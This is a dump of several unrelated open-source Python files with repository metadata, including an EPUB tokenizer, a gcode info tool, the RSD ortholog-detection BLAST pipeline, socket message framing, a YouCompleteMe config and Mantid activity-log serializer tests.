                          agent_id='fake_agent_id',
                          host='fake_host')
|
tcalmant/demo-ipopo-qt
|
android/compass/__init__.py
|
Python
|
gpl-2.0
| 439
| 0
|
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
Compass demo package
:author: Thomas Calmant
:copyright: Copyright 2013, isandlaTech
:license: GPLv2
:version: 0.1
:status: Alpha
"""
# Module version
__version_info__ = (0, 1, 0)
__version__ = ".".join(map(str, __version_info__))

# Documentation strings format
__docformat__ = "restructuredtext en"

# ------------------------------------------------------------------------------
ZloVechno/dummy-agent
|
functial/__init__.py
|
Python
|
gpl-3.0
| 621
| 0.030596
|
#! /usr/bin/python
# Module:
# Author: Maxim Borisyak, 2014
import functools
partial = functools.partial
from pattern import MatchError
fr
|
om pattern import case
from pattern import to_pattern
# Type patterns
from pattern import a_class
from pattern import a_str
from pattern import a_float
from pattern import an_int
# General patterns
from pattern import some
from pattern import otherwise
from pattern import constant
from match import match
from matc
|
h import match_f
from match import case_f
from match import match_method
from match import case_method
from match import merge_matches
from match import to_match
|
futurepr0n/Books-solutions
|
Python-For-Everyone-Horstmann/Chapter6-Lists/R6.1A.py
|
Python
|
mit
| 203
| 0.009852
|
# Given the list values = [], write code that fills the list with each set
# of numbers below.
# a. 1 2 3 4 5 6 7 8 9 10
# BUG FIX: the original used range(11), which yields 0..10 (eleven numbers,
# starting at 0) instead of the requested 1..10, and it shadowed the
# built-in name 'list'.
values = []
for i in range(1, 11):
    values.append(i)
print(values)
|
peterFran/LanguageListCreator
|
langtools/translator/EPUBTranslation.py
|
Python
|
mit
| 1,136
| 0.001761
|
from ebooklib import epub
from bs4 import BeautifulSoup
from nltk.tokenize import RegexpTokenizer
from langtools.translator.TextTranslation import TextTranslation
class EPUB(object):
"""docstring for EPUB"""
    def __init__(self, book_location):
        # Load the epub and keep only chapter-like documents (items that
        # expose 'is_chapter'), dropping images and other resources.
        book = epub.read_epub(book_location)
        # Filter out pictures and the like
        self.chapters = [item for item in book.items if 'is_chapter' in dir(item)]
        self.title = book.title
def get_chapter(self, number):
# pass xml to ChapterTranslationList
|
and return it
xml_chapter = self.chapters[
|
number].get_content().decode('utf-8')
chapter = BeautifulSoup(xml_chapter).get_text()
# Tokenize the text
tokenizer = RegexpTokenizer(r'\w+')
return tokenizer.tokenize(chapter)
class EPUBTranslation(EPUB):
    """EPUB variant whose chapters are wrapped in TextTranslation objects
    instead of being returned as raw token lists."""
    def get_chapter(self, number):
        # pass xml to ChapterTranslationList and return it
        xml_chapter = self.chapters[number].get_content().decode('utf-8')
        chapter = BeautifulSoup(xml_chapter).get_text()
        return TextTranslation(chapter)
|
ErwinRieger/ddprint
|
host/ddtool.py
|
Python
|
gpl-2.0
| 2,998
| 0.004671
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#/*
# This file is part of ddprint - a 3D printer firmware.
#
# Copyright 2020 erwin.rieger@ibrieger.de
#
# ddprint is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ddprint is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ddprint. If not, see <http://www.gnu.org/licenses/>.
#*/
import pprint, sys, os
import argparse, time
# import ddprintutil as util, gcodeparser, packedvalue, ddhome
# import ddtest
# from ddplanner import Planner
# from ddprinter import Printer, RxTimeout
def filamentTool(fn):
    """Placeholder for the filament/json tool -- not implemented yet.

    Raises NotImplementedError instead of the previous 'assert(0)':
    assert statements are stripped under 'python -O', which would have
    silently turned this stub into a no-op.
    """
    raise NotImplementedError("filamentTool is not implemented yet")
#
# Print some info's about gcode
#
def gcodeTool(fn):
    """Parse slicer settings embedded as ';' comments in a gcode file and
    print a summary (layer height, speeds, max flowrate).

    NOTE(review): reconstructed from a garbled source dump -- the nesting of
    the inner value-collection loop should be double-checked against the
    original file.
    """
    lineno = 0
    settings = argparse.Namespace(generator="")
    for line in open(fn).readlines():
        stripped = line.strip()
        if stripped.startswith(";"):
            tokens = stripped.split()
            ti = 1
            while ti < len(tokens):
                token = tokens[ti].lower()
                valtokens = token.split(",")
                if len(valtokens) >= 2:
                    # "key,value" style setting; any further tokens on the
                    # line are collected as additional values.
                    v = valtokens[1:]
                    while ti+1 < len(tokens):
                        v.append(tokens[ti])
                        ti += 1
                    settings.__setattr__(valtokens[0].lower(), v)
                    break
                if token == "generated":
                    # Remember the generator banner line verbatim.
                    settings.generator = stripped
                    break
                ti += 1
        lineno += 1
    lh = float(settings.layerheight[0])
    ew = float(settings.extruderwidth[0])
    # Slicer speeds are mm/min; convert to mm/s.
    spd = float(settings.defaultspeed[0]) / 60
    xyspd = float(settings.rapidxyspeed[0]) / 60
    zspd = float(settings.rapidzspeed[0]) / 60
    print("\nGCode info's:")
    print("-------------")
    print("Model (STL) : %s" % settings.applytomodels)
    print("Generator : %s" % settings.generator)
    print("LayerHeight : %.2f mm" % lh)
    print("ExtrudeWidth: %.2f mm" % ew)
    print("Speed : %.2f mm/s" % spd)
    print("Travelspeed : XY: %.2f Z: %.2f mm/s" % (xyspd, zspd))
    print("starting cod: \n %s" % "".join(settings.startinggcode).replace(";", "\n ;"))
    print("\nMax flowrate: %.2f mm³/s" % (lh*ew*spd))
# Dispatch on the input file's extension; silently does nothing when the
# argument count is not exactly one file.
if len(sys.argv) == 2:
    fn = sys.argv[1]
    ext = os.path.splitext(fn)[-1]
    if ext == ".json":
        # filamenttool
        filamentTool(fn)
    elif ext == ".gcode":
        # gcodetool
        gcodeTool(fn)
    else:
        print("unknown file/extension", ext)
|
sdague/home-assistant
|
tests/components/plex/helpers.py
|
Python
|
apache-2.0
| 248
| 0
|
"""Helper
|
methods for Plex tests."""
from plexwebsocket import SIGNAL_DATA
def trigger_plex_update(mock_websocket):
    """Invoke the data callback that was registered on the mocked websocket."""
    registered_callback = mock_websocket.call_args[0][1]
    registered_callback(SIGNAL_DATA, None, None)
|
todddeluca/reciprocal_smallest_distance
|
rsd/rsd.py
|
Python
|
mit
| 32,578
| 0.005556
|
#!/usr/bin/env python2.7
'''
RSD: The reciprocal smallest distance algorithm.
Wall, D.P., Fraser, H.B. and Hirsh, A.E. (2003) Detecting putative orthologs, Bioinformatics, 19, 1710-1711.
Original author: Dennis P. Wall, Department of Biological Sciences, Stanford University.
Contributors: I-Hsien Wu, Computational Biology Initiative, Harvard Medical School
Maintainer: Todd F. DeLuca, Center for Biomedical Informatics, Harvard Medical School
This program is written to run on linux. It has not been tested on Windows.
To run this program you need to have installed on your system:
Python 2.7
NCBI BLAST 2.2.24
paml 4.4
Kalign 2.04 (recommended) or clustalw 2.0.9 (deprecated)
See README for full details.
'''
# python package version
# should match r"^__version__ = '(?P<version>[^']+)'$" for setup.py
__version__ = '1.1.7'
import cStringIO
import glob
import logging
import os
import re
import shutil
import subprocess
import time
import fasta
import nested
import util
# Sentinel string recorded when codeml/paml fails on a pair.
PAML_ERROR_MSG = 'paml_error'
# Direction of a genome-vs-genome comparison.
FORWARD_DIRECTION = 0
REVERSE_DIRECTION = 1
# Captures leading dashes, the core sequence, and trailing dashes of an
# aligned sequence.
DASHLEN_RE = re.compile('^(-*)(.*?)(-*)$')
# Maximum number of blast hits kept per query sequence.
MAX_HITS = 3
# Data files shipped next to this module (codeml substitution matrix and
# control template).
MATRIX_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'jones.dat')
CODEML_CONTROL_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'codeml.ctl')
# Constants used when aligning seqs with clustalw. Kalign does not need these.
USE_CLUSTALW = util.getBoolFromEnv('RSD_USE_CLUSTALW', False)
CLUSTAL_INPUT_FILENAME = 'clustal_fasta.faa'
CLUSTAL_ALIGNMENT_FILENAME = 'clustal_fasta.aln'
#################
# BLAST FUNCTIONS
#################
#
# Used to compute blast hits between two genomes, parse the results, and save the best hits to a file
#
def formatForBlast(fastaPath):
    '''
    fastaPath: protein fasta file to build blast indexes for.
    Runs makeblastdb to create blast-formatted index files next to fastaPath.
    '''
    args = ['makeblastdb', '-in', fastaPath, '-dbtype', 'prot', '-parse_seqids']
    # redirect stdout to /dev/null to make the command quieter.
    with open(os.devnull, 'w') as devnull:
        subprocess.check_call(args, stdout=devnull)
def getHitId(hit):
    '''
    hit: a (subject sequence id, evalue) tuple.
    returns: the subject sequence id of the hit.
    '''
    hitId, _evalue = hit
    return hitId
def getHitEvalue(hit):
    '''
    hit: a (subject sequence id, evalue) tuple.
    returns: the hit's evalue as a float.
    '''
    _hitId, evalue = hit
    return evalue
def loadBlastHits(path):
    '''
    path: location of stored blast hits computed by computeBlastHits()
    returns: mapping object from query id to a list of (subject id, evalue)
    hit tuples. used to be a bsddb, now is a dict.
    '''
    return util.loadObject(path)
def getBlastHits(queryFastaPath, subjectIndexPath, evalue, limitHits=MAX_HITS, workingDir='.', copyToWorking=False):
    '''
    queryFastaPath: location of fasta file of query sequences
    subjectIndexPath: location and name of blast-formatted indexes.
    evalue: a string or float representing the maximum evalue threshold of hits to get.
    limitHits: maximum number of hits kept per query id; a falsy value keeps all hits.
    workingDir: creates, uses, and removes a directory under workingDir.
    copyToWorking: if True, copy query fasta path and subject index files to within the working directory and use the copies to blast.
    can improve performance if the working directory is on local disk and the files are on a slow network.
    blasts every sequence in query against subject, returning a dict mapping each query id
    to a list of (hit id, evalue) tuples better than evalue.
    '''
    # work in a nested tmp dir to avoid junking up the working dir.
    with nested.NestedTempDir(dir=workingDir, nesting=0) as tmpDir:
        if copyToWorking:
            localFastaPath = os.path.join(tmpDir, 'query.fa')
            shutil.copyfile(queryFastaPath, localFastaPath)
            localIndexDir = os.path.join(tmpDir, 'local_blast')
            # 0o770 (not the py2-only literal 0770) works on python 2.6+ and 3.
            os.makedirs(localIndexDir, 0o770)
            localIndexPath = os.path.join(localIndexDir, os.path.basename(subjectIndexPath))
            for path in glob.glob(subjectIndexPath + '*'):
                # bugfix: the original tested the function object `os.path.isfile`
                # (always truthy) instead of calling it, so the filter was a no-op.
                if os.path.isfile(path):
                    shutil.copy(path, localIndexDir)
            queryFastaPath = localFastaPath
            subjectIndexPath = localIndexPath
        blastResultsPath = os.path.join(tmpDir, 'blast_results')
        # blast query vs subject, writing tabular results for parseResults().
        cmd = ['blastp', '-outfmt', '6', '-evalue', str(evalue),
               '-query', queryFastaPath, '-db', subjectIndexPath,
               '-out', blastResultsPath]
        subprocess.check_call(cmd)
        # parse results
        hitsMap = parseResults(blastResultsPath, limitHits)
    return hitsMap
def computeBlastHits(queryFastaPath, subjectIndexPath, outPath, evalue, limitHits=MAX_HITS, workingDir='.', copyToWorking=False):
    '''
    queryFastaPath: location of fasta file of query sequences
    subjectIndexPath: location and name of blast-formatted indexes.
    evalue: a string or float representing the maximum evalue threshold of hits to get.
    outPath: location of file where blast hits are saved.
    limitHits: maximum number of hits kept per query id; a falsy value keeps all hits.
    workingDir: creates, uses, and removes a directory under workingDir.
    copyToWorking: if True, copy query fasta path and subject index files to within the working directory and use the copies to blast.
    can improve performance if the working directory is on local disk and the files are on a slow network.
    Runs getBlastHits() and persists the resulting hits map to outPath.
    '''
    hitsMap = getBlastHits(queryFastaPath, subjectIndexPath, evalue, limitHits, workingDir, copyToWorking)
    util.dumpObject(hitsMap, outPath)
def parseResults(blastResultsPath, limitHits=MAX_HITS):
    '''
    blastResultsPath: tabular (-outfmt 6) blast results file.
    limitHits: maximum number of hits kept per query id; a falsy value keeps all hits.
    returns: a map from query seq id to a list of tuples of (subject seq id, evalue) for the
    top hits of the query sequence in the subject genome.
    '''
    # parse tabular results into hits. thank you, ncbi, for creating results this easy to parse.
    hitsMap = {}
    hitsCountMap = {}
    prevSeqId = None
    prevHitId = None
    with open(blastResultsPath) as fh:
        for line in fh:
            splits = line.split()
            try:
                seqId = fasta.idFromName(splits[0]) # remove namespace prefix, e.g. 'gi|'
                hitId = fasta.idFromName(splits[1])
                hitEvalue = float(splits[10])
            except Exception:
                logging.exception('parseResults(): prevSeqId: {}, prevHitId: {}, line: {}'.format(prevSeqId, prevHitId, line))
                # bugfix: skip the malformed line. The original fell through and
                # used undefined (first line) or stale (later lines) seqId/hitId.
                continue
            # results table reports multiple "alignments" per "hit" in ascending order by evalue
            # we only store the top hits.
            if prevSeqId != seqId or prevHitId != hitId:
                prevSeqId = seqId
                prevHitId = hitId
                if seqId not in hitsCountMap:
                    hitsCountMap[seqId] = 0
                    hitsMap[seqId] = []
                if not limitHits or hitsCountMap[seqId] < limitHits:
                    hitsCountMap[seqId] += 1
                    hitsMap[seqId].append((hitId, hitEvalue))
    return hitsMap
###############
# RSD FUNCTIONS
###############
def pamlGetDistance(path):
    '''
    path: directory containing the codeml output file 2AA.t.
    Reads and deletes the 2AA.t distance matrix file under path and returns
    the pairwise distance it contains as a float.
    Raises: Exception tagged PAML_ERROR_MSG if the file is empty.
    '''
    filename = '%s/2AA.t' % path
    # adding a pause on the off-chance that the filesystem might be lagging a bit, causing the open() to fail below.
    # I think it is more likely that codeml in runPaml_all() is failing before writing the file.
    if not os.path.isfile(filename):
        time.sleep(0.5)
    with open(filename) as rst:
        get_rst = rst.readlines()
    os.unlink(filename)
    if not get_rst:
        raise Exception(PAML_ERROR_MSG, path)
    # Flatten the matrix lines (after the header count line) into one
    # whitespace-separated "name name dist ..." string.
    # (renamed from `str`, which shadowed the builtin)
    tokens = ''
    for line in get_rst[1:]:
        cd1 = line.split()
        if not len(cd1) > 1:
            tokens += "%s " % (line.split('\n')[0])
            continue
        if len(cd1) > 1:
            tokens += "%s %s" % (cd1[0], cd1[1])
    # The distance is the third whitespace-separated token.
    dist = float(tokens.split()[2])
    return dist
def alignFastaKalign(input):
    '''
    input: string containing fasta formatted sequences to be aligned.
    runs alignment program kalign (must be on the PATH)
    Returns: fasta-formatted aligned sequences
    '''
    alignedFasta = util.run(['kalign', '-f', 'fasta'], input) # output clustalw format
    return alignedFasta.replace('\n\n', '\n') # replace fixes a bug in Kalign version 2.04, where if a seq is exactly 60 chars long, an extra newline is output.
def alignFastaClustalw(input, path):
'''
input: string containing f
|
USC-ACTLab/pyCreate2
|
pyCreate2/visualization/__init__.py
|
Python
|
mit
| 59
| 0
|
from
|
.virtual_create import *
__all__ = ["Virtua
|
lCreate"]
|
carzil/bowman
|
bowman/utils.py
|
Python
|
gpl-2.0
| 1,151
| 0.004344
|
# Copyright 2012 Andreev Alexander <carzil@yandex.ru>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import struct
from .server.exceptions import Disconnect
import math
# Wire format: a big-endian signed 32-bit payload length, then the payload.
PACK_HEADER = ">l"  # pack_size
PACK_HEADER_SIZE = struct.calcsize(PACK_HEADER)
class Connection():
    """Length-prefixed UTF-8 message framing over a socket."""
    def __init__(self, socket_):
        self.socket = socket_
    def _recv_exactly(self, size):
        """Receive exactly `size` bytes; raise Disconnect if the peer closes early."""
        chunks = []
        remaining = size
        while remaining > 0:
            chunk = self.socket.recv(remaining)
            if not chunk:
                # Peer closed the connection mid-message.
                raise Disconnect()
            chunks.append(chunk)
            remaining -= len(chunk)
        return b"".join(chunks)
    def get_pack(self):
        """Read one framed packet and return its payload decoded as UTF-8."""
        data = self._recv_exactly(PACK_HEADER_SIZE)
        try:
            pack_size = struct.unpack(PACK_HEADER, data)[0]
        except struct.error:
            raise Disconnect()
        # bugfix: a single recv() may return fewer than pack_size bytes for
        # large packets; loop until the whole payload has arrived.
        data = self._recv_exactly(pack_size)
        data = data.decode("utf-8")
        return data
    def send_pack(self, data):
        """Send `data` (str or bytes) as one length-prefixed packet."""
        if not isinstance(data, bytes):
            data = bytes(data, "utf-8")
        pack_size = struct.pack(PACK_HEADER, len(data))
        # bugfix: send() may write only part of the buffer; sendall() retries
        # until everything is sent.
        self.socket.sendall(pack_size)
        self.socket.sendall(data)
def distance(player1, player2):
    """Euclidean distance between two players' (x, y) positions, rounded to int."""
    dx = player1.x - player2.x
    dy = player1.y - player2.y
    return round(math.sqrt(dx ** 2 + dy ** 2))
|
diogocs1/comps
|
web/openerp/report/common.py
|
Python
|
apache-2.0
| 3,337
| 0.013785
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Page dimensions in millimetres, keyed by paper format name: (width, height).
# NOTE(review): 'A5' is listed landscape (148.5 wide x 105 high) while 'A4' is
# portrait -- presumably intentional, but worth confirming against callers.
pageSize = {
    'A4': (210,297),
    'A5': (148.5,105)
}
# XML namespace prefix -> Clark-notation URI map for ODT (OpenDocument) files.
odt_namespace = {
    "office": "{urn:oasis:names:tc:opendocument:xmlns:office:1.0}",
    "style": "{urn:oasis:names:tc:opendocument:xmlns:style:1.0}",
    "text": "{urn:oasis:names:tc:opendocument:xmlns:text:1.0}",
    "table": "{urn:oasis:names:tc:opendocument:xmlns:table:1.0}",
    "draw": "{urn:oasis:names:tc:opendocument:xmlns:drawing:1.0}",
    "fo": "{urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0}",
    "xlink": "{http://www.w3.org/1999/xlink}",
    "dc": "{http://purl.org/dc/elements/1.1/}",
    "meta": "{urn:oasis:names:tc:opendocument:xmlns:meta:1.0}",
    "number": "{urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0}",
    "svg": "{urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0}",
    "chart": "{urn:oasis:names:tc:opendocument:xmlns:chart:1.0}",
    "dr3d": "{urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0}",
    "math": "{http://www.w3.org/1998/Math/MathML}",
    "form": "{urn:oasis:names:tc:opendocument:xmlns:form:1.0}",
    "script": "{urn:oasis:names:tc:opendocument:xmlns:script:1.0}",
    "ooo": "{http://openoffice.org/2004/office}",
    "ooow": "{http://openoffice.org/2004/writer}",
    "oooc": "{http://openoffice.org/2004/calc}",
    "dom": "{http://www.w3.org/2001/xml-events}",
}
# XML namespace prefix -> Clark-notation URI map for legacy SXW
# (OpenOffice.org 1.x writer) documents.
sxw_namespace = {
    "office":"{http://openoffice.org/2000/office}",
    "style":"{http://openoffice.org/2000/style}",
    "text":"{http://openoffice.org/2000/text}",
    "table":"{http://openoffice.org/2000/table}",
    "draw":"{http://openoffice.org/2000/drawing}",
    "fo":"{http://www.w3.org/1999/XSL/Format}",
    "xlink":"{http://www.w3.org/1999/xlink}",
    "dc":"{http://purl.org/dc/elements/1.1/}",
    "meta":"{http://openoffice.org/2000/meta}",
    "number":"{http://openoffice.org/2000/datastyle}",
    "svg":"{http://www.w3.org/2000/svg}",
    "chart":"{http://openoffice.org/2000/chart}",
    "dr3d":"{http://openoffice.org/2000/dr3d}",
    "math":"{http://www.w3.org/1998/Math/MathML}",
    "form":"{http://openoffice.org/2000/form}",
    "script":"{http://openoffice.org/2000/script}",
    "ooo":"{http://openoffice.org/2004/office}",
    "ooow":"{http://openoffice.org/2004/writer}",
    "oooc":"{http://openoffice.org/2004/calc}",
    "dom":"{http://www.w3.org/2001/xml-events}"}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
reuk/wayverb
|
.ycm_extra_conf.py
|
Python
|
gpl-2.0
| 5,675
| 0.021498
|
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
    # Diagnostics and language mode.
    '-Wall',
    '-Wextra',
    '-Werror',
    '-Wno-long-long',
    '-Wno-variadic-macros',
    '-fexceptions',
    '-DNDEBUG',
    '-DUSE_CLANG_COMPLETER',
    '-std=c++14',
    '-xc++',
    # Project-specific include paths.
    '-Isrc/waveguide/include',
    '-Isrc/utilities/include',
    '-Isrc/audio_file/include',
    '-Isrc/frequency_domain/include',
    '-Isrc/waveguide/compensation_signal/lib/include',
    '-Isrc/raytracer/include',
    '-Isrc/core/include',
    '-Isrc/hrtf/lib/include',
    '-Isrc/combined/include',
    '-Ibin/box/include',
    '-Ibuild/include',
    '-Ibuild/dependencies/include',
    '-Ibuild/src/core',
    '-Ibuild/src/waveguide',
    '-Iwayverb/Source',
    '-Iwayverb/JuceLibraryCode/modules',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
    """Absolute path of the directory containing this configuration file."""
    here = os.path.abspath(__file__)
    return os.path.dirname(here)
def MakeRelativePathsInFlagsAbsolute(flags, working_directory):
    """Return a copy of `flags` with relative paths resolved against working_directory.

    Handles both two-token forms ('-I', 'path') and fused forms ('-Ipath',
    '--sysroot=path'). Without a working directory the flags are returned
    unchanged (as a new list). Empty flags are dropped.
    """
    if not working_directory:
        return list(flags)
    path_flags = ['-isystem', '-I', '-iquote', '--sysroot=']
    absolute_flags = []
    expect_path = False  # True when the previous flag was a bare path option
    for flag in flags:
        updated = flag
        if expect_path:
            expect_path = False
            if not flag.startswith('/'):
                updated = os.path.join(working_directory, flag)
        for prefix in path_flags:
            if flag == prefix:
                # Bare option: the *next* flag is the path to absolutize.
                expect_path = True
                break
            if flag.startswith(prefix):
                relative = flag[len(prefix):]
                updated = prefix + os.path.join(working_directory, relative)
                break
        if updated:
            absolute_flags.append(updated)
    return absolute_flags
def IsHeaderFile(filename):
    """True when `filename` has a C/C++ header extension."""
    _, extension = os.path.splitext(filename)
    return extension in ('.h', '.hxx', '.hpp', '.hh')
def GetCompilationInfoForFile(filename):
    """Look up compile flags for `filename` in the global compilation database.

    The compilation_commands.json generated by CMake has no entries for
    header files, so for a header we try each sibling source file (same
    basename, a source extension) and reuse its flags. Returns None when
    nothing usable is found.
    """
    if not IsHeaderFile(filename):
        return database.GetCompilationInfoForFile(filename)
    basename, _ = os.path.splitext(filename)
    for extension in SOURCE_EXTENSIONS:
        candidate = basename + extension
        if not os.path.exists(candidate):
            continue
        compilation_info = database.GetCompilationInfoForFile(candidate)
        if compilation_info.compiler_flags_:
            return compilation_info
    return None
def FlagsForFile(filename, **kwargs):
    """YCM entry point: return {'flags': [...]} for `filename`.

    Uses the compilation database when one is configured, otherwise falls
    back to the static `flags` list made absolute against this script's
    directory.
    """
    if database:
        # Bear in mind that compilation_info.compiler_flags_ does NOT return a
        # python list, but a "list-like" StringVec object.
        compilation_info = GetCompilationInfoForFile(filename)
        if not compilation_info:
            return None
        final_flags = MakeRelativePathsInFlagsAbsolute(
            compilation_info.compiler_flags_,
            compilation_info.compiler_working_dir_)
        # NOTE: This is just for YouCompleteMe; it's highly likely that your project
        # does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
        # ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
        try:
            final_flags.remove('-stdlib=libc++')
        except ValueError:
            pass
    else:
        final_flags = MakeRelativePathsInFlagsAbsolute(flags, DirectoryOfThisScript())
    return {'flags': final_flags}
|
eviljeff/olympia
|
src/olympia/activity/tests/test_serializers.py
|
Python
|
bsd-3-clause
| 4,454
| 0
|
# -*- coding: utf-8 -*-
from rest_framework.test import APIRequestFactory
from olympia import amo
from olympia.activity.models import ActivityLog
from olympia.activity.serializers import ActivityLogSerializer
from olympia.amo.tests import TestCase, addon_factory, user_factory
class LogMixin(object):
    """Test mixin for creating ActivityLog entries.

    Requires the using test case to provide self.addon and self.user.
    """
    def log(self, comments, action, created=None):
        """Create an ActivityLog for `action` against the latest listed version.

        created: optional datetime used to backdate the log entry.
        """
        version = self.addon.find_latest_version(
            channel=amo.RELEASE_CHANNEL_LISTED)
        details = {'comments': comments,
                   'version': version.version}
        kwargs = {'user': self.user, 'details': details}
        al = ActivityLog.create(action, self.addon, version, **kwargs)
        if created:
            al.update(created=created)
        return al
class TestReviewNotesSerializerOutput(TestCase, LogMixin):
def setUp(self):
self.request = APIRequestFactory().get('/')
self.user = user_factory(reviewer_name='fôo')
self.addon = addon_factory()
self.now = self.days_ago(0)
self.entry = self.log(u'Oh nøes!', amo.LOG.REJECT_VERSION, self.now)
def serialize(self, context=None):
if context is None:
context = {}
context['request'] = self.request
serializer = ActivityLogSerializer(self.entry, context=context)
return serializer.to_representation(self.entry)
def test_basic(self):
result = self.serialize()
assert result['id'] == self.entry.pk
assert result['date'] == self.now.isoformat() + 'Z'
assert result['action'] == 'rejected'
assert result['action_label'] == 'Rejected'
assert result['comments'] == u'Oh nøes!'
# To allow reviewers to stay anonymous the user object only contains
# the author name, which can use the reviewer name alias if present
# depending on the action.
assert result['user'] == {
'name': self.user.reviewer_name,
}
def test_basic_v3(self):
self.request.version = 'v3'
result = self.serialize()
assert result['id'] == self.entry.pk
assert result['date'] == self.now.isoformat() + 'Z'
assert result['action'] == 'rejected'
assert result['action_label'] == 'Rejected'
assert result['comments'] == u'Oh nøes!'
# For backwards-compatibility in API v3 the id, url and username are
# present but empty - we still don't want to reveal the actual reviewer
# info.
assert result['user'] == {
'id': None,
'url': None,
'username': None,
'name': self.user.reviewer_name,
}
def test_basic_somehow_not_a_reviewer_action(self):
"""Like test_basic(), but somehow the action is not a reviewer action
and therefore shouldn't use the reviewer_name."""
self.entry.update(action=amo.LOG.ADD_RATING.id)
result = self.serialize()
assert result['user'] == {
'name': self.user.name,
}
def test_should_highlight(self):
result = self.serialize(context={'to_highlight': [self.entry.pk]})
assert result['id'] == self.entry.pk
assert result['highlight']
def test_should_not_highlight(self):
no_highlight = self.log(u'something élse', amo.LOG.REJECT_VERSION)
result = self.serialize(context={'to_highlight': [no_highlight.pk]})
assert result['id'] == self.entry.pk
assert not result['highlight']
def test_sanitized_activity_detail_not_exposed_to_developer(self):
self.entry = self.log(u'ßäď ŞŤųƒƒ', amo.LOG.REQUEST_ADMIN_REVIEW_CODE)
result = self.serialize()
assert result['action_label'] == (
amo.LOG.REQUEST_ADMIN_REVIEW_CODE.short)
# Comments should be the santize
|
d text rather than the actual content.
assert result['comments'] == amo.LOG.REQUEST_ADMIN_REVIEW_CODE.sanitize
assert result['comments'].startswith(
'The addon has been flagged for Admin Review.')
def test_log_entry_without_details(self):
# Create a log but without a details property.
self.entry = ActivityLog.create(
amo.LOG.APPROVAL
|
_NOTES_CHANGED, self.addon,
self.addon.find_latest_version(channel=amo.RELEASE_CHANNEL_LISTED),
user=self.user)
result = self.serialize()
# Should output an empty string.
assert result['comments'] == ''
|
mganeva/mantid
|
scripts/PyChop/PyChop2.py
|
Python
|
gpl-3.0
| 10,393
| 0.003464
|
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX
|
- License - Identifier: GPL - 3.0 +
# pylint: disable=line-too-long, invalid-name, old-style-class, multiple-statements, too-many-branches
"""
This module contains the PyChop2 class which allows calculation of the resolution and flux of
direct geometry time-of-flight inela
|
stic neutron spectrometers.
"""
from __future__ import (absolute_import, division, print_function)
from .ISISFermi import ISISFermi
from .ISISDisk import ISISDisk
import warnings
class PyChop2:
"""
PyChop2 is a class to calculate the energy resolution of direct geometry time-of-flight spectrometers
based on calculations of the time spread of neutron bunches. It currently has separate implementations
for instruments using Fermi choppers and disk choppers for monochromation.
"""
__Classes = {
'LET': ISISDisk, # LET default
'LETHIFLUX': ISISDisk, # LET, high flux configuration
